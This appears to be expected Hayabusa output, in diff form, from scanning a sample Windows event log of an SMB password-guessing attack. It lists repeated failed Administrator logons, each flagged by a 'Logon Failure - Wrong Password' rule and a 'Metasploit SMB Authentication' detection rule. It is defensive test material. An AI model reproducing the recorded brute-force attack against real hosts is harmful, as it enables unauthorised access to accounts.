+2016-09-20 01:51:52.150 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:52.195 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: fCTUmKwLxkKCoCTn  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:52.195 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:52.236 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: DBE7Y8yJMNSkJlaK  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:52.236 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:52.276 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: N7VGVfH05BC7bgaZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:52.276 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:52.309 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: lP7kC2ayRIEeL5sw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:52.309 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:52.357 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2cQOn41cB2t0ZkSP  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:52.357 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:52.398 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: PpOyXZwlcCw63tWP  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:52.398 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:52.445 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 7R8yD7A0lCU16Z0t  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:52.445 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:52.481 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: frasd7f8On0O7B6k  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:52.481 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:52.529 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FtOqqV6rkCIZPPFG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:52.529 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:52.585 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: lnwn4dc1lKABRKxH  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:52.585 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:52.624 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: CiUnLFzfXR6rER9B  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:52.624 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:52.668 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: u1InESrL0ebaRw2z  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:52.668 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:52.712 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: IlLAG8gXt9YNeW4H  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:52.712 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:52.757 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: uZIWubLvZcDOWHxr  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:52.757 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:52.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FZazp7ZnBrtswAse  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:52.796 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:52.849 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: jqK5Vqf0QF4qtg0A  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:52.849 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:52.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: k3JvFwi9gDNbO6Sj  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:52.884 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:52.932 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: fBubAOTZMsahNG0Q  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:52.932 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:52.981 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KCxrXG3N1IRzDxxM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:52.981 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:53.024 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: e2h9M7o0lS7oC00a  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:53.024 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:53.074 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: pprfGGVZblL64xC3  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:53.074 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:53.127 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: wxgzMKd7eDwzs8WO  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:53.127 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:53.238 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: q2RljqAhn0NZhR6O  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:53.238 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:53.268 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: rcxQVtjMqnE1wGfr  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:53.268 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:53.321 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: fSRggYsSiJGsGSyV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:53.321 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:53.374 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: yQqfSKOyKLSILPrQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:53.374 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:53.552 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: k7oAI2q6YCu8btlK  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:53.552 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:53.610 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KniVwndqE9aC6cIM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:53.610 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:53.657 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FgQbvpfuS11matJi  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:53.657 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:53.702 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: R9TwJS4B9ZaDD2Ze  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:53.702 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:53.749 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: IPUuoopOnwlTjlTP  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:53.749 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:53.806 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 9VEyOUuiOi8Q3JBJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:53.806 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:53.862 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: pGGGazMTBBfrppDZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:53.862 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:53.919 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: NKO4V35Y2qPEB59W  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:53.919 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:53.964 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: WxVdhpR7ZnAluurU  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:53.964 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:54.016 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: gZjAZb9bQKZjwL8u  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:54.016 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:54.066 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: aKyLX5ChpgBuFEbr  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:54.066 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:54.112 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 49t2xJvH2yHcyHle  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:54.112 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:54.168 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: sg9Z6Pyix2UkMolr  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:54.168 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:54.210 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 0NN2olYn97ZoYCja  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:54.210 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:54.249 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: S98j54bDGsz0k6g9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:54.249 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:54.284 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: XxFEw9s0nnEQGzUN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:54.284 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:54.342 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: wSswFHFSlqcQd47k  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:54.342 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:54.385 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 7icutlVIWSLZJszQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:54.385 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:54.440 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: DSwyugYn0n3i5f25  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:54.440 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
